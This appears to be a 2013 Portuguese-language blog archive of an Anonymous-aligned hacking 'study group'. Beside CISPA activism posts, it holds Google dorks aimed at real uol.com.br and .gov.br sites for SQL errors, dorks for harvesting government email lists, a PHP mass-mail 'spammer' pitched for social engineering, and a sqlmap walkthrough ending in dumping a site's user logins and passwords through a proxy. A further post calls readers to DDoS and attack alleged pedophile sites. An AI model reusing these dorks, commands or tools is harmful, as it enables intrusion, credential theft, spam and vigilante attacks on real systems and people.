quinta-feira, 9 de maio de 2013

Dork:Procurando erros de programação em Subdomínios Uol.com.br

 Procurando erros de programação em Subdomínios Uol.com.br


Procurando erros de programação em Subdomínios Uol.com.br

Dork:
site:uol.com.br  "Warning" +"foreach()" +mysql_*
By: às
Marcadores: ,

quinta-feira, 2 de maio de 2013

Novo Grupo de Estudos Lacking Faces


Novo Grupo de Estudos Lacking Faces


È com prazer que venho anunciar nosso novo grupo de estudos cheio de apostilas e conteúdos para que todos possam aprender e compartilhar seus conhecimentos .
https://www.facebook.com/groups/400262363415175/
By: às
Marcadores: ,

segunda-feira, 22 de abril de 2013

A Lacking Faces convida todos a assistirem a palestra "Cyberativismo para Além do Sofá"

 Cyberativismo


 
A Lacking Faces convida todos a assistirem a palestra "Cyberativismo para Além do Sofá", que ocorrerá em nosso canal no Raid Call.
 
A Lacking Faces convida todos a assistirem a palestra "Cyberativismo para Além do Sofá", que ocorrerá em nosso canal no Raid Call.




Hora de início: 21hs (horário de Brasília).


Palestrante: Draven.


Duração: 40 minutos.


ID: 5187397




Download do programa Raid Call: http://www2.raidcall.com/v7/download-raidcall.html




Contamos com a presença de todos.


Nós somos Anonymous.


Somos uma legião.


Nós não perdoamos.


Nós não esquemos.

Grupo de estudos:https://www.facebook.com/LackingFace?group_id=454736671230528

By: às
Marcadores: ,

domingo, 21 de abril de 2013

Blackout da Internet - Dia 22 de Abril de 2013

 Blackout da Internet - Dia 22 de Abril de 2013 

Blackout da Internet - Dia 22 de Abril de 2013

 O que é CISPA ??  

O CISPA permite que empresas privadas compartilhem uma ampla gama de dados de clientes entre si e com as agências governamentais, afirmam os grupos de defesa da privacidade.

Os defensores do projeto, no entanto, argumentaram que é necessária uma legislação para promover um melhor compartilhamento de informação sobre ciberataques ativos, resultando em uma melhor defesa de redes norte-americanas. A lei federal atualmente proíbe que as agências de inteligência compartilhem informações classificadas sobre ameaças cibernéticas com empresas privadas.
Uma ampla gama de empresas de tecnologia e grupos comerciais manifestou apoio à CISPA. "Todos os dias, os provedores de serviços de Internet veem e respondem a um crescente número de ameaças virtuais que podem causar prejuízo econômico significativo e violações de privacidade pessoal", disse a Associação Nacional de Telecomunicações em um comunicado. "[O CISPA] permite que empresas privadas e governo compartilhem informações que irão aumentar a proteção de nossa infraestrutura de Internet, dos consumidores e da economia dos Estados Unidos."
O grupo de direitos digitais Free Press disse que está desapontado com o voto. "O CISPA ainda destruirá as nossas leis de privacidade e acabará com a liberdade de expressão online", disse o diretor de política Matt Wood, por e-mail. "Precisamos garantir que empresas removam informações pessoais irrelevantes quando compartilham nossos dados, e que essas empresas possam ser responsabilizadas por ignorar e abusar das liberdades civis dos usuários de Internet."

 

O Anonymous Norte Americano convoca para que no dia 22 de Abril façamos parte da Op Blackout da Internet com o objetivo de chamar a atenção do Senado norte americano para o veto da CISPA (ato que permitirá que Facebook, Twitter e Google forneçam seus dados confidenciais para o Governo Norte Americano e, provavelmente, empresas com fins lucrativos).
Abaixo o vídeo e sua transcrição. Dado o tempo curto que temos para divulgar segue sem legendas... nos trazendo à luz da regra que "a comunicação há de ser efetiva não necessariamente própria."

By: às

O que é Leitura fria ???

O que é Leitura fria ???

 

 O que é  Leitura fria ???

Muito usada por engenheiro sociais.


Leitura fria é um conjunto de técnicas que buscam avaliar, de forma aprofundada ou superficial, uma pessoa ou um ambiente físico; principal ferramenta ao auxílio de diversas profissões ligadas as características comportamentais e psicológicas do ser humano.
A história da leitura fria está ligada diretamente ao empresário norte americano, Phineas Taylor Barnum, conhecido por P.T Barnum. É considerado por muitos profissionais que utilizam a leitura fria como ferramenta de trabalho o "pai" da leitura fria. P.T Barnum utilizou-a em suas atividades empresarias com um nível considerável de acerto.
A leitura fria e suas técnicas têm como base o factor do Raio-X, mapeamento de características comportamentais e psicológicas de uma pessoa.
O factor Raio-X não só avalia características comportamentais e psicológicas, MAS também ambiente fisico, objetos sendo ferramentas ou não, possibilitando uma maior flexibilidade na leitura fria.
Muitos especialistas definem a leitura fria como uma ferramenta utilizada por todos com um único objetivo: conhecer o desconhecido.
As principais técnicas e mais famosas de leitura fria são: - Linguagem corporal (leitura fria através dos gestos e micro-gestos, cocientes e inconscientes da pessoa); - Grafologia (leitura fria através da grafia da pessoa); - Voz (tonalidade, volume, português...); - Nome (é feita uma leitura através do nome da pessoa);

By: às
Marcadores: ,

quinta-feira, 18 de abril de 2013

Espalhe: #EndCISPA Lei de Proteção e Compartilhamento de Inteligência Cibernética (CISPA)


Espalhe: #EndCISPA Lei de Proteção e Compartilhamento de Inteligência Cibernética (CISPA)



Espalhe: #EndCISPA
 
Assine: https://action.eff.org/o/9042/p/dia/action/public/?action_KEY=9137

Sabe o e-mail que você enviou hoje? Ou aquela mixtape que mandou pros amigos? Ou mesmo o compartilhamento de uma imagem que você fez no Facebook? Tudo isso está agora sob sério risco de ser vigiado pelo governo americano. Isso porque nesta quarta, 17, na surdina, o Congresso americano passou a Lei de Proteção e Compartilhamento de Inteligência Cibernética (CISPA) 
que:
Permite que as empresas (qualquer empresa) coletem informações particulares de um usuário e enviem todas essas informações para o governo americano e setores privados interessados no que parece ser uma tentativa de “conter” crimes online.

Em outras palavras, a nossa liberdade de internet – e isso diz respeito a QUALQUER pessoa do mundo – está ameaçada por uma lei americana que pretende vigiar todos os nossos passos e usar isso sabe-se lá com que intenções.
By: às
Marcadores:

quarta-feira, 17 de abril de 2013

HoneyMap monitoramento de ataques hackers


HoneyMap é um mapa do mundo em tempo real, Que visualiza ataques capturados por honeypots do projeto Honeynet. Marcadores vermelhos no mapa representam os atacantes, marcadores amarelos são os alvos (sensores honeypot).


HoneyMap é um mapa do mundo em tempo real, Que visualiza ataques capturados por honeypots do projeto Honeynet. Marcadores vermelhos no mapa representam os atacantes, marcadores amarelos são os alvos (sensores honeypot).

Link:http://map.honeynet.org/
By: às
Marcadores: , ,

terça-feira, 19 de março de 2013

INFORMATIVO - Lacking Faces

INFORMATIVO - Lacking Faces


A Lacking Faces é um grupo de ativismo segundo os princípios da ideia Anonymous,
de maneira que nosso papel é de divulgação desta ideia e conscientização social.
Nosso grupo não é vinculado a atividades hackers e por esta nomenclatura
não se auto-denomina.
Vale ressaltar, também, que,
a Lacking Faces não é responsável pelos arquivos disponibilizados
em qualquer de nossos setores.
Cada arquivo é de responsabilidade do membro que o postou.
Os temas propostos para estudos nos meios digitais dizem respeito à
segurança da informação e dos usuários.
Nenhuma das habilidades aqui aprendidas são colocadas em prática pelo grupo,
de forma que a responsabilidade é unicamente do individuo que venha a realizar.
Apartir de hoje LackingFaces apenas ira se dedicar ao ativismo e concientização da ideia Anonymous

Grupo de estudos:https://www.facebook.com/groups/GdELackingFaces/
By: às Um comentário:
Marcadores: , ,

segunda-feira, 18 de março de 2013

Doks pesquisa erros sql nos determinados domínios .gov.br . ou .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Dork: site:org.br | site:gov.br & ('800a000d' | "MySQL Error") & inurl:*id*= -forum -forums -xoops -portal -tutorial
By: às 2 comentários:
Marcadores: , ,

sexta-feira, 15 de março de 2013

Script PHP-DB=MYSQL Envio de e-mail em massa.

Script PHP-DB=MYSQL Envio de e-mail em massa.

Script PHP-DB=MYSQL Envio de e-mail em massa.


Script spammer para envio em massa, diferenciado pois vai dar uma grande consistência na sua engenharia social
Vinculado com banco de dados Mysql suas msg chegaram de forma dinâmica
Com os seguinte dados
---------------------------------------
nome,email,cargo,end,data
---------------------------------------
ONDE ne sua engenharia html ficara da seguinte forma com os parâmetros.
Nome do cliente: NOME_ENG

Email do cliente: EMAIL_ENG

Cargo do
cliente: CARGO_ENG
Data do envio que você determinou no campo banco: DATA_ENG


Esses dados serão filtrados e trocados pelos os do banco de dados.
A function MAIL(); deve esta devidamente configurada.

Na function conectart() é definido os dados de acesso do BD.
Configuração de envio.
$GLOBALS['assunto'] = "O assunto usado!";
$GLOBALS['email_remetente'] =  "Remetendete.com.br";
$GLOBALS['eng_arq'] = "seuarquivo.html";

Exemplo de arqvui

Nome do cliente: NOME_ENG

Email do cliente: EMAIL_ENG

Cargo do cliente: CARGO_ENG

Data do envio que você determinou no campo banco: DATA_ENG


Modo de uso

php script.php








By: às 2 comentários:
Marcadores: , ,

quinta-feira, 14 de março de 2013

Introdução Grupo de estudos Lacking Faces

A proposta da Lacking Faces é a de promover ações para um mundo melhor, dentro dos princípios da ideia Anonymous, sendo assim, oferece vários ambientes virtuais para que seus membros compartilhem informações e desenvolvam seus conhecimentos para que possam realizar seu ativismo com seriedade e eficiência.
Nesta página estão todas as informações necessárias para que os membros (ou futuros membros da Lacking Faces compreendam a rotina do grupo de estudos, suas regras e seus princípios. Além disso, é possível também a todos terem acesso aos diferentes setores da Lacking Faces.
Por fim, é de grande importância que todos tenham ciência do que consta nos links apontados abaixo, para zelar pela qualidade dos trabalhos e da aprendizagem de todos.
Contem com nossa equipe de moderadores, e vamos juntos lutar por um mundo mais justo.
Viva Anonymous.
Viva Lacking Faces.
Somos uma legião.
Link de acesso: http://lackingfaces.net/introducao/
By: às Um comentário:
Marcadores: ,

sábado, 9 de março de 2013

Personalizando comandos SQLMAP e Analise de código PHP


Personalizando comandos SQLMAP e Analise de código PHP


Personalizando comandos SQLMAP e Analise de código PHP

SQLMAP é a uma ótima ferramenta de injeção SQL que eu já vi: feito em python, Opensource, e os comandos vão de acordo com a necessidade do invasor.
 Vamos intender como funciona á URL

 URL: https://www.siteteste.com.br/index.php?id=1 
https :[Protocolo usado]
 www.siteteste.com.br :[Domínio alvo]
 index.php :[Arquivo php onde tem os include que fazem a consulta]
 ?id :[Parâmetro GET que recebe valores para que assim faça uma consulta no BD ou validação.]
1 :[Valor que será passado]
Código:

index.php?id=1
 -------------------------------INDEX.PHP-------------------------

  3. if($_GET['id']){
  4. $id = $_GET['id']; // Capturando valor GET e inserindo na variavel $id;

  6. require_once('include/function.php'); // Inserindo arquivo function no código atual.

  8. }?>

  11. Teste SQLMAP
  • pesquisa("noticias",$id);
  • ------------------------------------------------------------------------
    Agora vamos entender como funciona o arquivo function.php

    ----------------------------FUNCTION.PHP-------------------------

    3. function pesquisa($tabela,$id){ //Noma da function

    5. $con = mysql_connect("localhost","root","123456"); // editar host, usuario, senha

    7. $sql = "SELECT * FROM web.{$tabela} WHERE id={$id}"; //concatenando valores, web é o banco de dados.

    9. $query = mysql_query($sql); //executando select

    11. if (!$query) {  die ('ERRO!:' . mysql_error()); }//Se der algo errado.

    13. while($escrever=mysql_fetch_array($query)){ //Agora vamos percorrer o array.

    15.     echo "$escrever['NOTICIA']
      ";
    16. //Imprimindo valor atual do campo noticia

    18. }

    20.  mysql_close($con); // Fechando conexão!
    21. ?>

    ----------------------------------------------------------------------------
    Codigo vulneravel pois em nem um momento é feito o filtro adequado do parâmetroID assim possibilitando a modificação do sql de busca. 
    Digamos se na get_['id'] o usuario inserir o seguinte valorindex.phpid?=-1 order by 50; 
    Se a tabela noticias tiver menos que se 50 colunas ele vai retorno falando que não existe 50 colunas.Assim vai, o Sqlmap faz todo trabalho de injeção identificando quantidade de colunas, a versão do banco.Se as senhas estiverem em md5 o sqlmap já tem um wordlist.


    Dentro do codigo ficaria assim.
    $sql = "SELECT * FROM web.{$tabela} WHERE id={$id}";
    Valor modificado "SELECT * FROM web.noticias WHERE id=-1 order by 50;"

    Agora vamos para o sqlmap

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 --dbs -p id -v 3 --proxy="http://localhost:8118"

    Não explicarei comandos sqlmap favor pesquisar.

    Pelo código criado o site esta vulnerável e retorna os seguintes valores.Banco de dados:

    [ * ] web
    [ * ] information_schema

    Agora queremos saber quais as tabelas do banco de dados "web".

     ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" --tablesTabelas:
    [ * ] usuario
    [ * ] noticias
    [ * ] smtp
    [ * ] blog


    Neste momento precisamos saber quais as colunas da tabela usuario.

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" -T usuario --columns

    +--------+--------------+
    | Column | Type |
    +--------+--------------+
    | ID | int(11) |
    | login | varchar(255) |
    | senha | varchar(255) |
    +--------+--------------+

    Logico que queres saber os usuario e senhas do site.

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" -T usuario -C "ID,login,senha" --dump


    Vamos lá galera estudar não basta saber os comandos.Tem que é o funcionamento.

    Grupo de Estudos Lacking Face &Anonymous Brasil.
    By: às Um comentário:
    Marcadores: , , ,

    sexta-feira, 8 de março de 2013

    Dork busca email

    Dork email .governo

    Dork  email .governo


     Dorkeiros de plantão que adoram list emails...
    Dorks para emails-list relacionado ao governo brasileiro.

    intext:@camara.leg.br ext:txt

    intext:@*.leg.br or intext:@*.gov.br ext:txt

    Alterando o formato ext: outros formatos.
    Exemplo de uso:ext:log ou ext:sql ou ext:ini
    By: às Nenhum comentário:
    Marcadores: , , ,

    Pacote de estudos INURL!


    Para fanáticos em DORKS!

    Para fanáticos em DORKS!

    INTRODUÇÃO Usando o Google para se defender de ataques:

    http://blog.inurl.com.br/2011/01/google-use-melhor-seu-tempo-nas.html

    Google Use melhor seu tempo nas pesquisas:

    http://blog.inurl.com.br/2011/01/introducao-usando-o-google-para-se.html

    Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos:

    http://blog.inurl.com.br/search/label/Mundo%20INURL%20Conceito

    Google operadores guide:

    http://blog.inurl.com.br/2010/08/google-operadores-guide.html#_

    LF DORK SCANNER 1.0

    https://www.facebook.com/groups/GdELackingFaces/579968352015846


    Grupo de Estudos Lacking Face &Anonymous Brasil
    Acesse:https://www.facebook.com/groups/GdELackingFaces/
    By: às Nenhum comentário:
    Marcadores: , ,

    quinta-feira, 7 de março de 2013

    #OPprojetodestruiçãopedofiliazero Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL.

    Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL. Vamos fazer isso em alvos certos contra sites que propagam pedofilia pela internet. Conheça o PROJETO DESTRUIÇÃO um braço da Lacking faces contra essa mal que assombra crianças em todo mundo. #OPprojetodestruiçãopedofiliazero


     PROJETO DESTRUIÇÃO


    Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL.
    Vamos fazer isso em alvos certos contra sites que propagam pedofilia pela internet.
    Conheça o PROJETO DESTRUIÇÃO um braço da Lacking faces contra essa mal que assombra crianças em todo mundo.

    #OPprojetodestruiçãopedofiliazero

    No dia 08 de março de 2013 , as 19:00 Horário de Brasília venha juntar-se a Nós, Vamos acabar com esses porcos que acabam com a inocência de crianças, e que publicam e comercializam vídeos e fotos.
    Esta OP faz parte de um projeto contra a pedofilia, (https://www.facebook.com/groups/projetodestruicaolackingfaces/).
    Peço que todos divulguem aos quatro ventos, para atacarmos estes porcos, vamos atacar com todas as forças, desde DDos, até mesmo exposed e denuncias dos ADM’S destes sites.
    Iremos atacar massivamente estes sites vergonhosos, usando de todas as informações e ferramentas possíveis.
    A exposição dos nomes destes sites informados pelos usuários serão para fazer dentro da OP apenas no dia dos ataques.
    Criaremos pânico entre esses porcos, pois saibam que eles comunicam-se entre eles.
    EVENTO:
    https://www.facebook.com/events/122762874572946/
    By: às Um comentário:
    Marcadores: , ,

    quarta-feira, 6 de março de 2013

    Index of / Wireshark 6 pdf tutoriais.

    Navegando pelas dorks da vida encontrei esse index of que pode ajudar muitos do grupo que querem conhecer a ferramenta Wireshark
    Navegando pelas dorks da vida encontrei esse index of que pode ajudar muitos do grupo que querem conhecer a ferramenta Wireshark
    Index of /
    http://www.eee.ufg.br/~cgalvao/redes/lab/EEEC -
    Escola de Engenharia Elétrica e de Computação - UFG
    EMAIL.pdf 29-Nov-2012 23:59 101K
    Wireshark_IP.pdf 17-Jan-2013 23:53 253K
    Wireshark_TCP.pdf 17-Jan-2013 16:29 360K
    Wireshark_UDP.pdf 17-Jan-2013 23:46 42K
    tutorial-wireshark.pdf 20-Nov-2012 20:19 716K
    wireshark-dns.pdf 20-Nov-2012 20:22 345K
    wireshark-http.pdf 20-Nov-2012 20:22 200K

    Grupo de Estudos Lacking Face &Anonymous Brasil
    By: às Um comentário:
    Marcadores: , ,

    Documentos para estudo FTP publico registro.br


    Documentos para estudo FTP publico registro.br


    Conferencias web
    ftp://ftp.registro.br/pub/
    ftp://ftp.registro.br/pub/w3c/
    ftp://ftp.registro.br/pub/w3c/wwwbrasil2009/
    ftp://ftp.registro.br/pub/w3c/Conferencia_Web_10-2010/
    ftp://ftp.registro.br/pub/forumdainternet/


    Inúmeros PDF de treinamento voltados para TI - SEC.
     ftp://ftp.registro.br/pub/gts/

    Agora só garimpar e baixar.
    Usuários Linux já sabem que um wget é uma boa escolha.

    Fonte:     Grupo de Estudos Lacking Face &Anonymous Brasil 
     https://www.facebook.com/groups/GdELackingFaces/doc/580825741930107/
    By: às Um comentário:
    Marcadores: , ,

    domingo, 3 de março de 2013

    LF DORK SCANNER 1.0 - Motor de busca: UOL - personalizada do google, feito em perl


    LF DORK SCANNER 1.0 - Motor de busca: UOL - personalizada do google, feito em perl
    LF DORK SCANNER 1.0

    Motor de busca: UOL - personalizada do google.
    Parâmetros de pesquisa: Dorks.
    Feito em perl.
    Exemplo de uso: inurl:php?id= noticias site:br

    # LackingFaces { http://lackingfaces.net/ }
    # Escaner de SQLI para fins educacionais,
    # Não nos responsabilizamos pelo mau uso do mesmo.

    Para ter acesso deve solicitar entrada no grupo de estudos LackingFaces    https://www.facebook.com/groups/GdELackingFaces/
    *Conceito INURL
    https://www.facebook.com/groups/GdELackingFaces/doc/519677934711555/

    Biblioteca Google Hacking
    http://blog.inurl.com.br/p/biblioteca-g-h.html

    Baixar:http://pastebin.com/yVwm9VT1
    By: às
    Marcadores: ,

    quinta-feira, 28 de fevereiro de 2013

    LackingWeb Pequeno webbrowser feito em c# Programa + Fonte

    LackingWeb Pequeno webbrowser feito em c# Programa + Fonte

    Navegador web simples feito em C#
    Campos: combo com motores de busca para escolher
    Textbox para pesquisa botão de pesquisa e de controle.
    Link:https://www.facebook.com/groups/GdELackingFaces/577536878925660/
    Fonte:Grupo de Estudos Lacking Face &Anonymous Brasil.

    Grupo livre pra todos que querem aprender!
    Nossa única exigência é que se sinta bem!
    Nosso alvo é espalhar conhecimento, pra juntos, podermos lutar contra injustiças em geral! Unidos como um, divididos por zero!
    Somos muitos!
    By: às Um comentário:
    Marcadores: ,

    LackingMysql Consulta em BD Mysql programa + fonte

    LackingMysql Consulta em BD Mysql programa + fonte

    Feito em C#


    Conecta em bancos de dados mysql.
    Campos, Servidor,Login,Senha,SQL

    Feito para estudantes de programação C#

    Necessita: Microsoft .NET Framework 4


    Link Download:https://www.facebook.com/groups/GdELackingFaces/577583682254313/

    Créditos Grupo de Estudos Lacking Face e Anonymous Brasil

    Grupo livre pra todos que querem aprender!
    Nossa única exigência é que se sinta bem!
    Nosso alvo é espalhar conhecimento, pra juntos, podermos lutar contra injustiças em geral! Unidos como um, divididos por zero!
    Somos muitos!

    By: às Nenhum comentário:
    Marcadores: ,
    Assinar: Postagens (Atom)

    Parceiro: Camisetas Hacker

    Camisetas para Nerds & Hackers